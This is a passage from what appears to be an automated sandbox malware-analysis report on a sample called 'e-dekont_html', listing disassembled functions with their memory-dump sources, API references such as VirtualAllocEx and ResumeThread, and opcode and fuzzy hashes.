                                                                                                                                                          • Instruction Fuzzy Hash: 4221E4B59002499FDB10CFAAD984ADEFFF8EB48320F14801AE918A7310C378A940CF64
                                                                                                                                                          Function 076B1081 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076B10F6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                          • Opcode ID: 940a3944e67519116dbb61ceb741ebf9e060bc627fb6f0d2661dc8185fe11617
                                                                                                                                                          • Instruction ID: e30db197180697dd1635e70835862f77c46c8e7b6b59e516031c6900e9e8bef9
                                                                                                                                                          • Opcode Fuzzy Hash: 940a3944e67519116dbb61ceb741ebf9e060bc627fb6f0d2661dc8185fe11617
                                                                                                                                                          • Instruction Fuzzy Hash: 0E1159B59002499FCB20DFAAC845BDEFFF5EF89320F24841AE519A7250C775A540DFA1
                                                                                                                                                          Function 08F04FDF Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: @
                                                                                                                                                          • API String ID: 0-2766056989
                                                                                                                                                          • Opcode ID: dc27dcb5883e26d33f50c15c43aa4886d87aba18775870615b0a5b6f00c78dca
                                                                                                                                                          • Instruction ID: b0011724ec713b3d2a65df657cd1ca0740feb2d48abfd2d30619585607f5821a
                                                                                                                                                          • Opcode Fuzzy Hash: dc27dcb5883e26d33f50c15c43aa4886d87aba18775870615b0a5b6f00c78dca
                                                                                                                                                          • Instruction Fuzzy Hash: F9E18FB8E00219CFDB50CFA8C980A9DBBF2FB49215F2491AAD818E7345D7319D86CF50
                                                                                                                                                          Function 076B1088 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076B10F6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                          • Opcode ID: a6abc6369e53328f389ccd7fbe53853c5e5fa60c9b5bb9f4f4e418a269ae9420
                                                                                                                                                          • Instruction ID: e234c020e106ef944c52587847a75be3307bdfb383f6fa98e6bbe9a04572b06d
                                                                                                                                                          • Opcode Fuzzy Hash: a6abc6369e53328f389ccd7fbe53853c5e5fa60c9b5bb9f4f4e418a269ae9420
                                                                                                                                                          • Instruction Fuzzy Hash: 551167B19002499FCB20DFAAC845BDEBFF5EF89320F20841AE529A7250C775A540DFA0
                                                                                                                                                          Function 076B0689 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                          • Opcode ID: 6e53673c4e29bbec0f42205b9ef5964929e2daeaf44d017aa0a02851068437d2
                                                                                                                                                          • Instruction ID: 19862926dce1b69a5601f455df0efc6f26003fe325750f7a818f9c65cb85fa43
                                                                                                                                                          • Opcode Fuzzy Hash: 6e53673c4e29bbec0f42205b9ef5964929e2daeaf44d017aa0a02851068437d2
                                                                                                                                                          • Instruction Fuzzy Hash: 691158B1D002498FDB20DFAAD4457EEFFF4EF98324F20841AD419A7340CA79A540CB91
                                                                                                                                                          Function 076B57A8 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 076B580D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 410705778-0
                                                                                                                                                          • Opcode ID: 538cf9293a65323e8d1c375eb44d359313855aa145f7bdccda814c751e6072c6
                                                                                                                                                          • Instruction ID: 98df77686a2d17142a2130f274ce63903a49501b7c6ce0cc58808628898e88eb
                                                                                                                                                          • Opcode Fuzzy Hash: 538cf9293a65323e8d1c375eb44d359313855aa145f7bdccda814c751e6072c6
                                                                                                                                                          • Instruction Fuzzy Hash: 391113B58002499FCB20DF99D885BDEFFF8EB48320F10841AE519A7601C375A594CFA1
                                                                                                                                                          Function 076B0690 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ResumeThread
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 947044025-0
                                                                                                                                                          • Opcode ID: 2160299e8b1e90fee25fd46d41c60579c2e60b8d96087ec07498fb5066ab5848
                                                                                                                                                          • Instruction ID: 293264fd2d3c0361b9f19781fe16f3009f1c67bda45c6d871b0f754e41e7f1da
                                                                                                                                                          • Opcode Fuzzy Hash: 2160299e8b1e90fee25fd46d41c60579c2e60b8d96087ec07498fb5066ab5848
                                                                                                                                                          • Instruction Fuzzy Hash: EC1128B19002498BDB20DFAAC4457DEFFF9AF98324F248419D519A7340C679A540CB91
                                                                                                                                                          Function 012BAF58 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 012BAFBE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1768343651.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_12b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HandleModule
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4139908857-0
                                                                                                                                                          • Opcode ID: 84e077fe3cb8d23ae1899ceb41b2f6800d7012c2dfa229048fceaeda95c15fcc
                                                                                                                                                          • Instruction ID: b95712a109122132a2bacf684be2604aa8c54f6f111035a4fa3c824cb817586b
                                                                                                                                                          • Opcode Fuzzy Hash: 84e077fe3cb8d23ae1899ceb41b2f6800d7012c2dfa229048fceaeda95c15fcc
                                                                                                                                                          • Instruction Fuzzy Hash: BC11E0B5C002498FDB24CF9AD484ADEFBF4EF88324F14841AD529A7650D379A545CFA1
                                                                                                                                                          Function 076B57B0 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 076B580D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1777811130.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_76b0000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessagePost
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 410705778-0
                                                                                                                                                          • Opcode ID: e4ef5f7356006313ad040a39085b7e5364d84f305731c8d930f611d49a69b339
                                                                                                                                                          • Instruction ID: 2bd9d32427937b471b8a37376caacaf9622f95a0f4e7efc2c9b4db1d599c611b
                                                                                                                                                          • Opcode Fuzzy Hash: e4ef5f7356006313ad040a39085b7e5364d84f305731c8d930f611d49a69b339
                                                                                                                                                          • Instruction Fuzzy Hash: 0F11C2B58002599FDB20DF9AD985BDEFBF8EB48320F24841AD519A7200C375A554CFA1
                                                                                                                                                          Function 08F03D9E Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: LRfq
                                                                                                                                                          • API String ID: 0-2333822924
                                                                                                                                                          • Opcode ID: d4c75f42e3f6ff6c96142b8360c1fcfe29092a05d65d4056dfc60d986317014f
                                                                                                                                                          • Instruction ID: ac730e33a6362649d229f72ab3745d195acec36220fbe66c59700ad596d8c1e2
                                                                                                                                                          • Opcode Fuzzy Hash: d4c75f42e3f6ff6c96142b8360c1fcfe29092a05d65d4056dfc60d986317014f
                                                                                                                                                          • Instruction Fuzzy Hash: 3C91D5B8E042189FCB14DFB9C8806AEBBF2EB49315F209529D819E7385E7359946DF40
                                                                                                                                                          Function 08F04894 Relevance: 1.4, Strings: 1, Instructions: 160COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tefq
                                                                                                                                                          • API String ID: 0-1066582953
                                                                                                                                                          • Opcode ID: 03f013a0ed44654d14837a12bfe9652468d5c4276bd9c60de1231a74dd815f1d
                                                                                                                                                          • Instruction ID: 53cc456548bfd6677ac7225ad9250cbc16ab6cfc1a98c3f305b44be6b1203d5d
                                                                                                                                                          • Opcode Fuzzy Hash: 03f013a0ed44654d14837a12bfe9652468d5c4276bd9c60de1231a74dd815f1d
                                                                                                                                                          • Instruction Fuzzy Hash: F851C074B002199FCB15DF79988847EBBF6EFC82107148969E456DB392DB709C068B50
                                                                                                                                                          Function 08F04428 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 8jq
                                                                                                                                                          • API String ID: 0-3286795621
                                                                                                                                                          • Opcode ID: 4ea63230f68caa320dba7bb4d58d3476d604c1199d86accf51685397dd66ab02
                                                                                                                                                          • Instruction ID: 2b566fd277de95620829eaf520d3dec9dddf9ec2f731e770e4470ceb843473e9
                                                                                                                                                          • Opcode Fuzzy Hash: 4ea63230f68caa320dba7bb4d58d3476d604c1199d86accf51685397dd66ab02
                                                                                                                                                          • Instruction Fuzzy Hash: 314104B9E011099FCB08DFA8D590AAEBBF2FB88305F109429E915A7380DB319D42DF54
                                                                                                                                                          Function 08F04417 Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 8jq
                                                                                                                                                          • API String ID: 0-3286795621
                                                                                                                                                          • Opcode ID: b750212d8f65e7042ee04de8e7d076b9e2b70a92c2cee959055b2a93f1a2b593
                                                                                                                                                          • Instruction ID: 619a30003541e21172c1451170114aa0972a01dcfd4c5531813f2437a7d13a3e
                                                                                                                                                          • Opcode Fuzzy Hash: b750212d8f65e7042ee04de8e7d076b9e2b70a92c2cee959055b2a93f1a2b593
                                                                                                                                                          • Instruction Fuzzy Hash: 8F415A74E011099FCB08DFA8D5806AEBBF2FB89304F10846AE955E7390DB319D42CF54
                                                                                                                                                          Function 08F0AC60 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tefq
                                                                                                                                                          • API String ID: 0-1066582953
                                                                                                                                                          • Opcode ID: 6066c487e8bd4260f674b707c66ca79db31ea3f47774bae819c6522ceb21f6b0
                                                                                                                                                          • Instruction ID: a018d84e08534d1e13725b769cb18995b6e04e340fb928ba6d5666f786016a06
                                                                                                                                                          • Opcode Fuzzy Hash: 6066c487e8bd4260f674b707c66ca79db31ea3f47774bae819c6522ceb21f6b0
                                                                                                                                                          • Instruction Fuzzy Hash: FB31E4B5E042188FDB08CFAAC5446EEBBB6FF89301F14D02AD419AB394DB705946CF40
                                                                                                                                                          Function 08F05608 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tefq
                                                                                                                                                          • API String ID: 0-1066582953
                                                                                                                                                          • Opcode ID: dd9133b1a49ed4dddd27ddd77c574c8f911040a3ce3300604ff657ab89dd3b5d
                                                                                                                                                          • Instruction ID: 27f53ff227c77aecfaa7c7ce36bf1facb0e61d5670358ab7aaed1f996897f0d6
                                                                                                                                                          • Opcode Fuzzy Hash: dd9133b1a49ed4dddd27ddd77c574c8f911040a3ce3300604ff657ab89dd3b5d
                                                                                                                                                          • Instruction Fuzzy Hash: EA111F71F0021A8FDB54EBB999105EFB7B6AB89252B10406DC514E7384EF719E02DFA1
                                                                                                                                                          Function 08F0AD09 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Tefq
                                                                                                                                                          • API String ID: 0-1066582953
                                                                                                                                                          • Opcode ID: cd169a34140b77433a077a6689e8405b09a7eab014fd639105b72f17cc31a6ae
                                                                                                                                                          • Instruction ID: bb1f22d55c999fb7c83bbeff77d271cdacbb1fab92b7d65335de9f718b26f4d9
                                                                                                                                                          • Opcode Fuzzy Hash: cd169a34140b77433a077a6689e8405b09a7eab014fd639105b72f17cc31a6ae
                                                                                                                                                          • Instruction Fuzzy Hash: AD116D75E002199FCB09CFE8D8849EDFBB2FF88314F14816AE918AB265C7316856CF40
                                                                                                                                                          Function 08F04038 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 7
                                                                                                                                                          • API String ID: 0-1790921346
                                                                                                                                                          • Opcode ID: acdc8a511917504139dafd16b9122dca7f2f861451ec6e7a64ea181994dee38c
                                                                                                                                                          • Instruction ID: 6d4e8afe0131a3ec4192dba498f0460fb0cd9425baed6cc80897b4f96240f758
                                                                                                                                                          • Opcode Fuzzy Hash: acdc8a511917504139dafd16b9122dca7f2f861451ec6e7a64ea181994dee38c
                                                                                                                                                          • Instruction Fuzzy Hash: 56E0C2B4C0610CEFCB10EFF8E8096AD7BB8A74020AF600198C50663380E7314A85EE45
                                                                                                                                                          Function 08F03348 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 6
                                                                                                                                                          • API String ID: 0-498629140
                                                                                                                                                          • Opcode ID: 76f466c5c70ab3647c661c5bed9baae07ca6e8d6d60221227168f7090bdc134c
                                                                                                                                                          • Instruction ID: 137dd5c7501ef130d248219521c2562509a87dad2df2ed68e0b52b15f8c1fd43
                                                                                                                                                          • Opcode Fuzzy Hash: 76f466c5c70ab3647c661c5bed9baae07ca6e8d6d60221227168f7090bdc134c
                                                                                                                                                          • Instruction Fuzzy Hash: 57E0C270C04208EFCB24EFB8D5896ADBFF8A709206F10559DD40593380EF329A81EE41
                                                                                                                                                          Function 08F07450 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: m
                                                                                                                                                          • API String ID: 0-3775001192
                                                                                                                                                          • Opcode ID: 82341814f31532dc03731cc327f782207f3a9d0788164d9c53fa2db5bcd65c1b
                                                                                                                                                          • Instruction ID: c5059131d7e11b44e8dcf1f7d2eefa30eb5b1a69545904af1f22e685ceb5a023
                                                                                                                                                          • Opcode Fuzzy Hash: 82341814f31532dc03731cc327f782207f3a9d0788164d9c53fa2db5bcd65c1b
                                                                                                                                                          • Instruction Fuzzy Hash: EAE08C78D05208DFCB14FAF8D4086AD7AB89B00202F0001D8C4455B380E6326AA4EEA2
                                                                                                                                                          Function 08F0AE8F Relevance: .3, Instructions: 260COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d59cc8f072456adb07cfe9d227ea79ee45c900e4d0d5118b57bd182836742c3b
                                                                                                                                                          • Instruction ID: 55f20c7c95781cae89983c1bbf154d39b66b3f3367ba18b8878cf1272d41fcb4
                                                                                                                                                          • Opcode Fuzzy Hash: d59cc8f072456adb07cfe9d227ea79ee45c900e4d0d5118b57bd182836742c3b
                                                                                                                                                          • Instruction Fuzzy Hash: D6A10C71E1121ACFCB04DFA8D980AADBBB5FF88311F209615E409AB355DB30AC85DF50
                                                                                                                                                          Function 08F06D37 Relevance: .2, Instructions: 193COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 29fb5d5eeb5d22134538ebcf9efd1ea6fb598b8816dadd4e100565292ffa7ac6
                                                                                                                                                          • Instruction ID: b628594fdcce7366f2a18798cc7cd15a035c98d069b977ec867368437b9931e9
                                                                                                                                                          • Opcode Fuzzy Hash: 29fb5d5eeb5d22134538ebcf9efd1ea6fb598b8816dadd4e100565292ffa7ac6
                                                                                                                                                          • Instruction Fuzzy Hash: B5819179E04219CFDF11CFA8C880AAEBBB2EF59305F109469E819EB341E7359956DF40
                                                                                                                                                          Function 08F06FA0 Relevance: .2, Instructions: 177COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ccc050c73acb0b71079c339a4de81579beb1b628eae624fc9bb7354919dd6ecf
                                                                                                                                                          • Instruction ID: 5e85cd4865761ff756e12de2f2dee239ddb68d53bc2ed8b2e8ab886d91eff1d8
                                                                                                                                                          • Opcode Fuzzy Hash: ccc050c73acb0b71079c339a4de81579beb1b628eae624fc9bb7354919dd6ecf
                                                                                                                                                          • Instruction Fuzzy Hash: 6051E375E083889FCB02DFB8C94499EBFF5AF4A210F1484EAE444EB292D7359805CF61
                                                                                                                                                          Function 08F0B427 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f1258d11a390b0beb47f383981b679b7671d029fcfd6ca865f760f26284a6fa0
                                                                                                                                                          • Instruction ID: d97f50347b7ebd5bc56d4fd12bcd6b50ff948ed002f665e09e45336dc5ca03f7
                                                                                                                                                          • Opcode Fuzzy Hash: f1258d11a390b0beb47f383981b679b7671d029fcfd6ca865f760f26284a6fa0
                                                                                                                                                          • Instruction Fuzzy Hash: 674118B5D08209CFCB04CFAAC5446FEBBF6EB8D322F14E1A9D459A6295D7308981DF50
                                                                                                                                                          Function 08F0C6C9 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c52ebe140a99e8f6b43ba5b0c47efb56b8f70aa55762e0efae5a50142a15d2f7
                                                                                                                                                          • Instruction ID: 526d06c5478036f6aae14823b2b474a2702f721b115e07abcba700dc3be1841d
                                                                                                                                                          • Opcode Fuzzy Hash: c52ebe140a99e8f6b43ba5b0c47efb56b8f70aa55762e0efae5a50142a15d2f7
                                                                                                                                                          • Instruction Fuzzy Hash: 7B413B75D05204CFC704CFADC5848ADFBBAFF49312B24A254E419A7292C735E981EF90
                                                                                                                                                          Function 08F08560 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 496eb7f6ca063999f1e9d0a46a85de46f6d3a9e746fc36a5c57692dd92440fbb
                                                                                                                                                          • Instruction ID: 86e0440d07ceefdb60212d7caab422e6e320a1e9fdb55b7980676c7d12566953
                                                                                                                                                          • Opcode Fuzzy Hash: 496eb7f6ca063999f1e9d0a46a85de46f6d3a9e746fc36a5c57692dd92440fbb
                                                                                                                                                          • Instruction Fuzzy Hash: 6941F7B4E10218DFCB04DFA9D880AAEBBF1EB89311F149469D825E7380EB359D42CF51
                                                                                                                                                          Function 08F08551 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6f60f8eabf93fa05b2d88d699c3a0f96b9b3e110bd157bfc282ef27ed8cd1854
                                                                                                                                                          • Instruction ID: 0736697175a7121e36c6636fba2d869f96db82f6d49c1e8cec10293edac91e9f
                                                                                                                                                          • Opcode Fuzzy Hash: 6f60f8eabf93fa05b2d88d699c3a0f96b9b3e110bd157bfc282ef27ed8cd1854
                                                                                                                                                          • Instruction Fuzzy Hash: BA4117B4E10208DFCB04DFA8C880AAEBBB2EB89311F159569D815E7390EB359D42CF50
                                                                                                                                                          Function 08F0BDB2 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.1780422849.0000000008F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F00000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_8f00000_e-dekont_html.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
